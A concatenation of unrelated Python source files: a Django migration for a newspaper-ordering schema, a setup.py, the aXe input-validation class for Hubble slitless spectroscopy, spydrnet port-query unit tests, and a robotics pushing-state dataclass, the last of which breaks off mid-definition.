                ('npName', models.CharField(max_length=50, verbose_name='Название газеты')),
                ('npEditorName', models.CharField(max_length=100, verbose_name='ФИО редактора')),
                ('npEditionIndex', models.IntegerField(verbose_name='Индекс издания')),
                ('npPrice', models.PositiveIntegerField(verbose_name='Цена экземпляра')),
            ],
        ),
        # Order: copy count plus a FK to the ordered newspaper; the FK to the
        # post office is added below via AddField (circular-creation pattern)
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('oNpCount', models.IntegerField(verbose_name='Количество экземпляров')),
                ('oNpCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Newspaper')),
            ],
        ),
        # PostOffice: office number and address
        migrations.CreateModel(
            name='PostOffice',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('poNum', models.PositiveIntegerField(verbose_name='Номер почтового отделения')),
                ('poAddress', models.CharField(max_length=500, verbose_name='Адрес почтового отделения')),
            ],
        ),
        # PrintingHouse: name, address and open/closed status (choices)
        migrations.CreateModel(
            name='PrintingHouse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phName', models.CharField(max_length=50, verbose_name='Название типографии')),
                ('phAddress', models.CharField(max_length=500, verbose_name='Адрес типографии')),
                ('phWorkStatus', models.CharField(choices=[('открыта', 'открыта'), ('закрыта', 'закрыта')], max_length=100, verbose_name='Статус')),
            ],
        ),
        # PrintRun: circulation size linking newspaper, order and printing house
        migrations.CreateModel(
            name='PrintRun',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('prPrintRun', models.PositiveIntegerField(verbose_name='Тираж')),
                ('prNpCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Newspaper')),
                ('prOCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Order')),
                ('prPhCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.PrintingHouse')),
            ],
        ),
        # deferred FK from Order to PostOffice (PostOffice is created after Order)
        migrations.AddField(
            model_name='order',
            name='oPoCode',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.PostOffice'),
        ),
    ]
|
# encoding: utf-8
"""
Copyright (c) 2009-2011 Johns Hopkins University. All rights reserved.
This software is provided AS IS under the terms of the Open Source MIT License.
See http://www.opensource.org/licenses/mit-license.php.
"""
from .vmo import VMOModel
from .double_rotation import VMODoubleRotation
from .session import VMOSession
from .placemap import CirclePlaceMap
from .trajectory import CircleTrackData
from .remapping import VMOExperiment, MismatchAnalysis, MismatchTrends
from .figures import *
|
from setuptools import find_packages, setup
from distutils.util import convert_path
# Package metadata for the tscli command-line client.
setup(
    name='tscli',
    # BUG FIX: a comma was missing after the version string, which made this
    # call a SyntaxError ("version='0.0.1' description=...").
    version='0.0.1',
    description='JSONRPC 2.0 client',
    author='',
    license='APACHE 2.0',
    install_requires=['colorama', 'argparse', 'pyyaml'],
    setup_requires=[],
    tests_require=['unittest'],
    test_suite='unittest',
    # BUG FIX: the 'packages' keyword takes concrete package names, not glob
    # patterns; use the already-imported find_packages() to discover them.
    packages=find_packages(),
)
|
"""
$Revision: 1.5 $ $Date: 2010/04/28 12:41:08 $
Author: Martin Kuemmel (mkuemmel@stecf.org)
Affiliation: Space Telescope - European Coordinating Facility
WWW: http://www.stecf.org/software/slitless_software/axesim/
"""
from __future__ import absolute_import
__author__ = "Martin Kuemmel <mkuemmel@eso.org>"
__date__ = "$Date: 2010/04/28 12:41:08 $"
__version__ = "$Revision: 1.5 $"
__credits__ = """This software was developed by the ACS group of the Space Telescope -
European Coordinating Facility (ST-ECF). The ST-ECF is a department jointly
run by the European Space Agency and the European Southern Observatory.
It is located at the ESO headquarters at Garching near Munich. The ST-ECF
staff supports the European astronomical community in exploiting the research
opportunities provided by the earth-orbiting Hubble Space Telescope.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
"""
import os
import os.path
from . import axeutils
from .axeerror import aXeError
from .axeerror import aXeSIMError
class InputChecker(object):
    """
    Collection of file-existence and parameter sanity checks for the aXe
    and aXeSIM tasks.

    The checker is created with the task name and (optionally) an Input
    Image List; the public check_* methods then raise aXeError/aXeSIMError
    with a task-prefixed message as soon as a problem is found.
    """
    def __init__(self, taskname, inlist=None, configs=None, backims=None):
        """
        Initializes the class

        @param taskname: name of the aXe task the checks are made for
        @type taskname: string
        @param inlist: name of the Input Image List (IIL)
        @type inlist: string
        @param configs: aXe configuration file term
        @type configs: string
        @param backims: background image term
        @type backims: string
        """
        from . import axeinputs
        # store the parameters
        self.taskname = taskname
        # check whether an IIL exists
        if inlist is not None:
            # make sure the Input Image List does exist
            if not os.path.isfile(inlist):
                err_msg = '%s: The Input Image List "%s" does not exist!' % (self.taskname, inlist)
                raise aXeError(err_msg)
            # create a list with the basic aXe inputs
            self.axe_inputs = axeinputs.aXeInputList(inlist, configs, backims)
        else:
            # set the parameter to None
            self.axe_inputs = None
    def _is_prism_data(self):
        """
        Check whether the input data is prism data.

        Inspects FILTER1/FILTER2 of the first grism image; a filter name
        containing 'PR' marks prism data.

        @return: 1 for prism data, 0 otherwise
        @rtype: int
        """
        from astropy.io import fits as pyfits
        # define the default
        is_prism = 0
        # make sure there are grism images
        if len(self.axe_inputs) > 0:
            # pick out one grism image
            one_grisim = self.axe_inputs[0]['GRISIM']
            # open the fits
            one_fits = pyfits.open(axeutils.getIMAGE(one_grisim), 'readonly')
            # read the keyword 'FILTER1'
            if 'FILTER1' in one_fits[0].header:
                filter1 = one_fits[0].header['FILTER1']
            else:
                filter1 = None
            # read the keyword 'FILTER2'
            if 'FILTER2' in one_fits[0].header:
                filter2 = one_fits[0].header['FILTER2']
            else:
                filter2 = None
            # check whether it is prism data
            if (filter1 and filter1.find('PR') > -1) or (filter2 and filter2.find('PR') > -1):
                # switch to IS_PRISM
                is_prism = 1
            # close the fits
            one_fits.close()
        # return the index
        return is_prism
    def _check_grism(self):
        """
        Check the presence of all grism images
        """
        # go over all inputs
        for one_input in self.axe_inputs:
            # check the grism image
            if not os.path.isfile(axeutils.getIMAGE(one_input['GRISIM'])):
                # error and out
                err_msg = '%s: The grism image: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']))
                raise aXeError(err_msg)
    def _check_direct(self):
        """
        Check the presence of all direct images
        """
        # make an empty list
        direct_list = []
        # go over all inputs
        for one_input in self.axe_inputs:
            # go on if there is no direct image
            if not one_input['DIRIM']:
                continue
            # go on if the direct image has already been checked
            if one_input['DIRIM'] in direct_list:
                continue
            # check the direct image
            if not os.path.isfile(axeutils.getIMAGE(one_input['DIRIM'])):
                # error and out
                err_msg = '%s: The direct image: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['DIRIM']))
                raise aXeError(err_msg)
            # put the direct image to the list
            direct_list.append(one_input['DIRIM'])
    def _check_IOL(self):
        """
        Check the presence and format of all Input Object Lists
        """
        from . import axeiol
        # make an empty list
        IOL_list = []
        # go over all inputs
        for one_input in self.axe_inputs:
            # go on if the list has been checked
            if one_input['OBJCAT'] in IOL_list:
                continue
            # check the Input Object List
            if not os.path.isfile(axeutils.getIMAGE(one_input['OBJCAT'])):
                # error and out
                # BUG FIX: the message wrongly called the object catalogue a
                # "direct image" (copy-paste from _check_direct)
                err_msg = '%s: The Input Object List: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['OBJCAT']))
                raise aXeError(err_msg)
            # load the IOL to check its format (the constructor raises on
            # malformed lists; the object itself is not needed afterwards)
            axeiol.InputObjectList(axeutils.getIMAGE(one_input['OBJCAT']))
            # put the IOL to the list
            IOL_list.append(one_input['OBJCAT'])
    def _check_config(self):
        """
        Check the presence of all configuration files
        """
        from . import configfile
        # make an empty list
        conf_list = []
        # go over all inputs
        for one_input in self.axe_inputs:
            # check whether the config was already tested
            if one_input['CONFIG'] in conf_list:
                continue
            # check the configuration file
            if not os.path.isfile(axeutils.getCONF(one_input['CONFIG'])):
                # error and out
                err_msg = '%s: The configuration file: "%s" does not exist!' % (self.taskname, axeutils.getCONF(one_input['CONFIG']))
                raise aXeError(err_msg)
            # load the configuration file;
            # make sure all files mentioned therein do exist
            conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
            conf.check_files()
            # put the config to the list
            conf_list.append(one_input['CONFIG'])
    def _force_dirim(self):
        """
        Make sure every grism image has an associated direct image
        """
        # go over all inputs
        for one_input in self.axe_inputs:
            # check whether there is a direct image
            if one_input['DIRIM'] is None:
                # error and out
                err_msg = '%s: The grism image: "%s" does NOT have an associated direct image!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']))
                raise aXeError(err_msg)
    def _check_masterbck(self):
        """
        Check the presence of all master background images
        """
        # make an empty list
        bck_list = []
        # go over all inputs
        for one_input in self.axe_inputs:
            # check whether the background was already tested
            if one_input['FRINGE'] in bck_list:
                continue
            # check the master background file
            if not os.path.isfile(axeutils.getCONF(one_input['FRINGE'])):
                # error and out
                err_msg = '%s: The master background file: "%s" does not exist!' % (self.taskname, axeutils.getCONF(one_input['FRINGE']))
                raise aXeError(err_msg)
            # put the background to the list
            bck_list.append(one_input['FRINGE'])
    def _check_fluxcubes(self):
        """
        Check the presence of all fluxcube files
        """
        from . import configfile
        # go over all inputs
        for one_input in self.axe_inputs:
            # load the config file and get the extension information
            conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
            ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
            # derive the aXe names
            axe_names = axeutils.get_axe_names(one_input['GRISIM'], ext_info)
            # check the fluxcube
            if not os.path.isfile(axeutils.getIMAGE(axe_names['FLX'])):
                # error and out
                err_msg = '%s: The fluxcube file: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(axe_names['FLX']))
                raise aXeError(err_msg)
    def _check_global_backsub(self):
        """
        Check for global background subtraction

        Every grism image must carry a keyword SKY_CPS >= 0.0 in its science
        extension, which marks a previous global sky subtraction.
        """
        from astropy.io import fits as pyfits
        from . import configfile
        # go over all inputs
        for one_input in self.axe_inputs:
            # load the config file and get the extension information
            conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
            ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
            # open the fits image
            gri_fits = pyfits.open(axeutils.getIMAGE(one_input['GRISIM']), 'readonly')
            # go to the correct header
            act_header = gri_fits[ext_info['fits_ext']].header
            # make sure a sky background value is set
            if 'SKY_CPS' in act_header and act_header['SKY_CPS'] >= 0.0:
                # close the fits
                gri_fits.close()
            else:
                # close fits, complain and out
                gri_fits.close()
                err_msg = '%s: The grism image: \n%s\nhas no keyword "SKY_CPS>=0.0" in the extension %i. This means it had NO global\nsky subtraction, which is required for the CRR version of aXedrizzle!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']), ext_info['fits_ext'])
                raise aXeError(err_msg)
    def _check_dpps(self, back=False):
        """
        Check the presence of all DPP files

        @param back: also check for the background DPP files
        @type back: boolean
        """
        from . import configfile
        # go over all inputs
        for one_input in self.axe_inputs:
            # load the config file and get the extension information
            conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
            ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
            # derive the aXe names
            axe_names = axeutils.get_axe_names(one_input['GRISIM'], ext_info)
            # check the DPP file
            if not os.path.isfile(axeutils.getOUTPUT(axe_names['DPP'])):
                # error and out
                err_msg = '%s: The DPP file: "%s" does not exist!' % (self.taskname, axeutils.getOUTPUT(axe_names['DPP']))
                raise aXeError(err_msg)
            # check for the background DPP file
            if back and not os.path.isfile(axeutils.getOUTPUT(axe_names['BCK_DPP'])):
                # error and out
                err_msg = '%s: The background DPP file: "%s" does not exist!' % (self.taskname, axeutils.getOUTPUT(axe_names['BCK_DPP']))
                raise aXeError(err_msg)
    def check_axeprep(self, backgr, backims):
        """
        Comprises all file and file format checks for AXEPREP

        @param backgr: flag for background subtraction
        @type backgr: boolean
        @param backims: background image term
        @type backims: string
        """
        # check the grism images
        self._check_grism()
        # check the configuration files
        self._check_config()
        # check the direct images
        self._check_direct()
        # check the IOL's
        self._check_IOL()
        # check for background subtraction
        if backgr:
            # make sure that a background
            # subtraction is possible
            if len(backims) < 1:
                err_msg = '%s: A background image must be given for the background subtraction!' % self.taskname
                raise aXeError(err_msg)
            # check the existence of background images
            self._check_masterbck()
    def check_axecore(self, back, extrfwhm, drzfwhm, backfwhm, orient, slitless_geom, np, interp,
                      cont_model, weights, sampling):
        """
        Comprises all file and file format checks for AXECORE
        """
        import math
        # check the grism images
        self._check_grism()
        # check the configuration files
        self._check_config()
        # check the direct images
        self._check_direct()
        # check the IOL's
        self._check_IOL()
        # check the fluxcubes, if necessary
        if cont_model.lower() == 'fluxcube':
            self._check_fluxcubes()
        # check whether it is prism data
        if self._is_prism_data():
            #
            # NOTE: these checks are not exactly
            #       related to files.....
            #
            # make sure that there are
            # direct images
            self._force_dirim()
            # the fluxcube contamination does not work for prism data
            if cont_model.lower() == "fluxcube":
                err_msg = '%s: Fluxcube contamination is not possible for prism data!' % self.taskname
                raise aXeError(err_msg)
            # drizzled stamp images are not supported for prism data
            if sampling.lower() == "drizzle":
                err_msg = '%s: Drizzle sampling for the stamp images is not possible for prism data!' % self.taskname
                raise aXeError(err_msg)
        # the extraction width must be set!
        if not extrfwhm:
            err_msg = '%s: "extrfwhm" must be > 0.0 to create PETs, but "extrfwhm=%.1f"!' % (self.taskname, extrfwhm)
            raise aXeError(err_msg)
        # negative extraction width is significant ONLY
        # if orient="NO"
        if orient and extrfwhm < 0.0:
            err_msg = '%s: Negative width "extrfwhm=%.1f" together with extraction "orient=yes" does NOT make sense!' % (self.taskname, extrfwhm)
            raise aXeError(err_msg)
        # for background extraction the width must be set!
        if back and not backfwhm:
            err_msg = '%s: With "back=yes" the parameter "backfwhm" must be set to create background PETs!' % self.taskname
            raise aXeError(err_msg)
        # extraction width and drizzle extraction width
        # must have the same sign
        if extrfwhm*drzfwhm < 0.0:
            err_msg = '%s: "extrfwhm=%.1f" and "drzfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, extrfwhm, drzfwhm)
            raise aXeError(err_msg)
        else:
            # the extractionwidth must be larger than the
            # drizzle extraction width
            if not math.fabs(extrfwhm) > math.fabs(drzfwhm):
                err_msg = '%s: fabs(extrfwhm) MUST be larger than fabs(drzfwhm), but "extrfwhm=%.1f" and "drzfwhm=%.1f"!' % (self.taskname, extrfwhm, drzfwhm)
                raise aXeError(err_msg)
        # extraction width and background extraction width
        # must have the same sign
        if back and extrfwhm*backfwhm < 0.0:
            err_msg = '%s: "extrfwhm=%.1f" and "backfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, extrfwhm, backfwhm)
            raise aXeError(err_msg)
        # the background extraction width must be larger than the
        # object extraction width
        elif back and math.fabs(extrfwhm) > math.fabs(backfwhm):
            err_msg = '%s: fabs(backfwhm) MUST be larger than fabs(extrfwhm), but "backfwhm=%.1f" and "extrfwhm=%.1f"!' % (self.taskname, backfwhm, extrfwhm)
            raise aXeError(err_msg)
        # for background extraction the number of background
        # pixels must be set
        if back and not np:
            err_msg = '%s: The parameter "np" must be set for the background PETs!' % self.taskname
            raise aXeError(err_msg)
        # for background extraction the interpolation
        # type must be set
        if back and not interp:
            err_msg = '%s: The parameter "interp" must be set for the background PETs!' % self.taskname
            raise aXeError(err_msg)
        # check for proper contamination
        # to allow optimal extraction
        if cont_model == "geometric" and weights:
            err_msg = """%s: Optimal weigthing needs quantitative contamination!
Please change to either the "gauss" or "fluxcube" contamination
model or drop optimal weighting!""" % self.taskname
            raise aXeError(err_msg)
    def check_axedrizzle(self, infwhm, outfwhm, back=False):
        """
        Comprises all file and file format checks for AXEDRIZZLE
        """
        import math
        # check the grism images
        self._check_grism()
        # check the configuration files
        self._check_config()
        # check the DPP files
        self._check_dpps(back)
        # make sure that fabs(infwhm) and fabs(outfwhm) > 0.0
        if math.fabs(infwhm) == 0.0 or math.fabs(outfwhm) == 0.0:
            err_msg = '%s: fabs(infwhm) AND fabs(outfwhm) must be larger than 0.0, but "infwhm=%.1f" and "outfwhm=%.1f"!' % (self.taskname, infwhm, outfwhm)
            raise aXeError(err_msg)
        # make sure that fabs(infwhm) > fabs(outfwhm)
        if math.fabs(infwhm) < math.fabs(outfwhm):
            err_msg = '%s: fabs(infwhm) MUST be larger than fabs(outfwhm), but "infwhm=%.1f" and "outfwhm=%.1f"!' % (self.taskname, infwhm, outfwhm)
            raise aXeError(err_msg)
        # make sure that infwhm and outfwhm
        # have consistent sign
        if infwhm * outfwhm < 0.0:
            err_msg = '%s: "infwhm=%.1f" and "outfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, infwhm, outfwhm)
            raise aXeError(err_msg)
    def check_axecrr(self, back):
        """
        Comprises all checks for the CRR version of AXEDRIZZLE
        """
        # make sure that background drizzling is off
        if back:
            err_msg = '%s: Background drizzling is NOT possible in the CRR version of aXedrizzle!' % (self.taskname)
            raise aXeError(err_msg)
        # check for global background subtraction
        self._check_global_backsub()
    def check_simdispim_input(self, incat, config, lambda_psf,
                              model_spectra, model_images,
                              nx, ny, exptime, bck_flux, extraction,
                              extrfwhm, orient, slitless_geom, adj_sens):
        """
        Does basic checks on the parameters

        The method checks whether all input values are reasonable, e.g.
        the exposure time and background flux >= 0.0 and similar.
        Input files are checked for existence. Also the input type is
        checked for the numbers.

        @param incat: name of model object table
        @type incat: string
        @param config: aXe configuration file name
        @type config: string
        @param lambda_psf: wavelength the object shapes were determined at
        @type lambda_psf: float
        @param model_spectra: name of model spectra
        @type model_spectra: string
        @param model_images: name of model images
        @type model_images: string
        @param nx: number of pixels in x
        @type nx: int
        @param ny: number of pixels in y
        @type ny: int
        @param exptime: exposure time
        @type exptime: float
        @param bck_flux: flux in background
        @type bck_flux: float
        @param extraction: flag for default extraction
        @type extraction: boolean
        @param extrfwhm: multiplier for extraction width
        @type extrfwhm: float
        @param orient: flag for tilted extraction
        @type orient: boolean
        @param slitless_geom: flag for slitless optimized extraction
        @type slitless_geom: boolean
        @param adj_sens: flag for adjusted flux conversion
        @type adj_sens: boolean
        """
        from . import configfile
        # do the setup
        axeutils.axe_setup(axesim=True)
        # check the existence of the
        # model object table
        if not os.path.isfile(axeutils.getIMAGE(incat)):
            error_message = 'The Model Object Table does not exist: ' + axeutils.getIMAGE(incat)
            raise aXeSIMError(error_message)
        # check the existence of the
        # axe configuration file
        if not os.path.isfile(axeutils.getCONF(config)):
            error_message = 'The aXe configuration file does not exist: ' + axeutils.getCONF(config)
            raise aXeSIMError(error_message)
        else:
            # load the aXe configuration file
            conf = configfile.ConfigFile(axeutils.getCONF(config))
            # make the internal checks
            n_sens = conf.check_files(check_glob=False)
            # make sure there is
            # at least one sens. file
            if n_sens < 1:
                error_message = 'There must be at least one sensitivity file in: ' + axeutils.getCONF(config)
                raise aXeSIMError(error_message)
            # check whether the configuration files
            # allows the requested extraction
            if extraction and (slitless_geom or adj_sens):
                extr_ready = conf.confirm_extrkeys()
                # error and out
                if not extr_ready:
                    error_message = """
It is not possible to perform the requested extraction.
The likely cause is that the configuration file does NOT contain
the keywords 'POBJSIZE' or 'SMFACTOR' or their values are NOT
reasonable (e.g. <0.0)!
"""
                    raise aXeSIMError(error_message)
        # check the lambda_psf-value
        if lambda_psf is not None and lambda_psf <= 0.0:
            # BUG FIX: "most be" --> "must be" (typo in the user message)
            error_message = 'Value for "lambda_psf" must be positive: ' + str(lambda_psf)
            raise aXeSIMError(error_message)
        if model_spectra is not None:
            # check the existence of the
            # model spectra file
            if not os.path.isfile(axeutils.getIMAGE(model_spectra)):
                error_message = 'The model spectra file does not exist: ' + axeutils.getIMAGE(model_spectra)
                raise aXeSIMError(error_message)
        if model_images is not None:
            # check the existence of the
            # model images file
            if not os.path.isfile(axeutils.getIMAGE(model_images)):
                error_message = 'The model images file does not exist: ' + axeutils.getIMAGE(model_images)
                raise aXeSIMError(error_message)
        # check the nx-value
        if nx is not None and nx <= 0.0:
            error_message = 'Value for "nx" or "nx_disp" must be positive: ' + str(nx)
            raise aXeSIMError(error_message)
        # check the ny-value
        if ny is not None and ny <= 0:
            error_message = 'Value for "ny" or "ny_disp" must be positive: ' + str(ny)
            raise aXeSIMError(error_message)
        # check the exptime-value
        if exptime is not None and exptime < 0:
            error_message = 'Value for "exptime" or "exptime_disp" must be positive: ' + str(exptime)
            raise aXeSIMError(error_message)
        # the extraction width must be set!
        if not extrfwhm:
            error_message = 'Value for "extrfwhm" must not be 0.0 to create PETs, but "extrfwhm=%.1f"!' % extrfwhm
            raise aXeSIMError(error_message)
        # negative extraction width is significant ONLY
        # if orient="NO"
        if orient and extrfwhm < 0.0:
            error_message = 'Negative width "extrfwhm=%.1f" together with extraction "orient=yes" does NOT make sense!' % extrfwhm
            raise aXeSIMError(error_message)
        # check the bck_flux-value; guard against None for consistency with
        # check_simdirim_input (float(None) would raise an uncaught TypeError)
        if bck_flux is not None:
            try:
                # convert to float
                bck = float(bck_flux)
                # check for positive value
                if bck < 0:
                    error_message = 'Value for "bck_flux" or "bck_flux_disp" must be positive: ' + str(bck_flux)
                    raise aXeSIMError(error_message)
            # catch a string
            except ValueError:
                # check for existence of file
                if not os.path.isfile(axeutils.getCONF(bck_flux)):
                    error_message = 'The background file does not exist: ' + axeutils.getCONF(bck_flux)
                    raise aXeSIMError(error_message)
    def check_simdirim_input(self, incat, config, tpass_direct,
                             model_spectra, model_images,
                             nx, ny, exptime, bck_flux):
        """
        Does basic checks on the parameters

        The method checks whether all input values are reasonable, e.g.
        the exposure time and background flux >= 0.0 and similar.
        Input files are checked for existence. Also the input type is
        checked for the numbers.

        @param incat: name of model object table
        @type incat: string
        @param config: aXe configuration file name
        @type config: string
        @param tpass_direct: total passband file
        @type tpass_direct: string
        @param model_spectra: name of model spectra
        @type model_spectra: string
        @param model_images: name of model images
        @type model_images: string
        @param nx: number of pixels in x
        @type nx: int
        @param ny: number of pixels in y
        @type ny: int
        @param exptime: exposure time
        @type exptime: float
        @param bck_flux: flux in background
        @type bck_flux: float
        """
        from . import configfile
        # do the setup
        axeutils.axe_setup(axesim=True)
        # check the existence of the
        # model object table
        if not os.path.isfile(axeutils.getIMAGE(incat)):
            error_message = 'The Model Object Table does not exist: ' + axeutils.getIMAGE(incat)
            raise aXeSIMError(error_message)
        # check the existence of the
        # axe configuration file
        if not os.path.isfile(axeutils.getCONF(config)):
            error_message = 'The aXe configuration file does not exist: ' + axeutils.getCONF(config)
            raise aXeSIMError(error_message)
        else:
            # load the aXe configuration file
            conf = configfile.ConfigFile(axeutils.getCONF(config))
            # make the internal checks
            n_sens = conf.check_files(check_glob=False)
            # make sure there is
            # at least one sens. file
            if n_sens < 1:
                error_message = 'There must be at least one sensitivity file in: ' + axeutils.getCONF(config)
                raise aXeSIMError(error_message)
        # check the existence of the
        # total passband file
        if not os.path.isfile(axeutils.getSIMDATA(tpass_direct)):
            error_message = 'The total passband file does not exist: ' + axeutils.getSIMDATA(tpass_direct)
            raise aXeSIMError(error_message)
        if model_spectra is not None:
            # check the existence of the
            # model spectra file
            if not os.path.isfile(axeutils.getIMAGE(model_spectra)):
                # BUG FIX: the message reported the config file name instead
                # of the missing model spectra file
                error_message = 'The model spectra file does not exist: ' + axeutils.getIMAGE(model_spectra)
                raise aXeSIMError(error_message)
        if model_images is not None:
            # check the existence of the
            # model images file
            if not os.path.isfile(axeutils.getIMAGE(model_images)):
                # BUG FIX: the message reported the config file name instead
                # of the missing model images file
                error_message = 'The model images file does not exist: ' + axeutils.getIMAGE(model_images)
                raise aXeSIMError(error_message)
        # check the nx-value
        if nx is not None and nx <= 0.0:
            error_message = 'Value for "nx" or "nx_dir" must be positive: ' + str(nx)
            raise aXeSIMError(error_message)
        # check the ny-value
        if ny is not None and ny <= 0:
            error_message = 'Value for "ny" or "ny_dir" must be positive: ' + str(ny)
            raise aXeSIMError(error_message)
        # check the exptime-value
        if exptime is not None and exptime < 0:
            error_message = 'Value for "exptime" or "exptime_dir" must be positive: ' + str(exptime)
            raise aXeSIMError(error_message)
        if bck_flux is not None:
            # check the bck_flux-value
            try:
                # convert to float
                bck = float(bck_flux)
                # check for positive value
                if bck < 0:
                    error_message = 'Value for "bck_flux" or "bck_flux_dir" must be positive: ' + str(bck_flux)
                    raise aXeSIMError(error_message)
            # catch a string
            except ValueError:
                # check for existence of file
                if not os.path.isfile(axeutils.getCONF(bck_flux)):
                    error_message = 'The background file does not exist: ' + axeutils.getCONF(bck_flux)
                    raise aXeSIMError(error_message)
|
import unittest
import spydrnet as sdn
class TestGetPorts(unittest.TestCase):
    """Unit tests for spydrnet's get_ports query across netlist elements."""

    def test_parameter_checking(self):
        # invalid argument combinations must raise TypeError
        definition = sdn.Definition()
        port = definition.create_port()
        port.name = "MY_PORT"
        # positional pattern and 'patterns' keyword are mutually exclusive
        self.assertRaises(TypeError, sdn.get_ports, definition, "MY_PORT", patterns="MY_PORT")
        self.assertRaises(TypeError, sdn.get_ports, definition, "MY_PORT", unsupported_keyword=None)
        # None is not a searchable object, alone or inside a collection
        self.assertRaises(TypeError, sdn.get_ports, None, "MY_PORT")
        self.assertRaises(TypeError, sdn.get_ports, [None, definition], "MY_PORT")
    def test_collection(self):
        # searching a heterogeneous collection yields each port only once
        definition = sdn.Definition()
        port = definition.create_port()
        port.name = "MY_PORT"
        instance = sdn.Instance()
        instance.name = "MY_INST"
        ports = list(sdn.get_ports([definition, instance]))
        self.assertEqual(len(ports), 1)
    def test_get_ports_on_instance(self):
        # an instance exposes the ports of its reference definition
        definition = sdn.Definition()
        port = definition.create_port()
        port.name = "MY_PORT"
        instance = sdn.Instance()
        instance.reference = definition
        port1 = next(instance.get_ports("MY_PORT"))
        self.assertEqual(port, port1)
    def test_get_ports_in_library(self):
        # a library query finds ports of definitions it contains
        library = sdn.Library()
        definition = library.create_definition()
        port = definition.create_port()
        port.name = "MY_PORT"
        instance = sdn.Instance()
        instance.reference = definition
        port1 = next(library.get_ports("MY_PORT"))
        self.assertEqual(port, port1)
    def test_get_ports_in_netlist(self):
        # a netlist query searches through its libraries' definitions
        netlist = sdn.Netlist()
        library = netlist.create_library()
        definition = library.create_definition()
        port = definition.create_port()
        port.name = "MY_PORT"
        instance = sdn.Instance()
        instance.reference = definition
        port1 = next(netlist.get_ports("MY_PORT"))
        self.assertEqual(port, port1)
    def test_get_port_reflection(self):
        # querying a port for its own name returns the port itself
        port = sdn.Port()
        port.name = "MY_PORT"
        search = next(sdn.get_ports(port, "MY_PORT"))
        self.assertEqual(port, search)
    def test_get_port_inner_pin(self):
        # an inner pin resolves to its owning port; a detached pin to nothing
        port = sdn.Port()
        pin = port.create_pin()
        search = next(sdn.get_ports(pin))
        self.assertEqual(port, search)
        port.remove_pin(pin)
        search = next(sdn.get_ports(pin), None)
        self.assertIsNone(search)
    def test_get_port_instance_and_outer_pin(self):
        # both an instance and one of its outer pins resolve to the port
        definition = sdn.Definition()
        port = definition.create_port()
        pin = port.create_pin()
        instance = sdn.Instance()
        instance.reference = definition
        search = next(sdn.get_ports(instance))
        self.assertIs(port, search)
        outer_pin = instance.pins[pin]
        search = next(sdn.get_ports(outer_pin))
        self.assertIs(port, search)
    def test_get_ports_href_cable(self):
        # a hierarchical cable reference resolves to the connected port
        netlist = sdn.Netlist()
        library = netlist.create_library()
        definition = library.create_definition()
        port = definition.create_port()
        pin = port.create_pin()
        cable = definition.create_cable()
        wire = cable.create_wire()
        wire.connect_pin(pin)
        instance = sdn.Instance()
        instance.reference = definition
        netlist.top_instance = instance
        href = next(sdn.get_hcables(cable))
        search = next(sdn.get_ports(href))
        self.assertIs(port, search)
    def test_unique(self):
        # overlapping query roots must not produce duplicate results
        netlist = sdn.Netlist()
        library = netlist.create_library()
        definition = library.create_definition()
        port = definition.create_port()
        pin = port.create_pin()
        cable = definition.create_cable()
        wire = cable.create_wire()
        wire.connect_pin(pin)
        instance = sdn.Instance()
        instance.reference = definition
        search = list(sdn.get_ports([netlist, cable]))
        self.assertIs(port, search[0])
        search = list(sdn.get_ports(cable))
        self.assertIs(port, search[0])
|
# coding=utf-8
# Copyright 2022 The Reach ML Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataclass holding info needed for pushing oracles."""
import dataclasses
from typing import Any
@dataclasses.dataclass
class PushingInfo:
    """Holds onto info necessary for pushing state machine."""
    # block position in the xy plane
    xy_block: Any = None
    # end-effector position in the xy plane
    xy_ee: Any = None
    # staging position in front of the block
    xy_pre_block: Any = None
    # offset to a pose next to the block
    xy_delta_to_nexttoblock: Any = None
    # offset to a pose touching the block
    xy_delta_to_touchingblock: Any = None
    # direction vector from block to end effector
    xy_dir_block_to_ee: Any = None
    # angle threshold that triggers re-orientation
    theta_threshold_to_orient: Any = None
    # angle threshold considered "flat enough" to push
    theta_threshold_flat_enough: Any = None
    # current orientation error
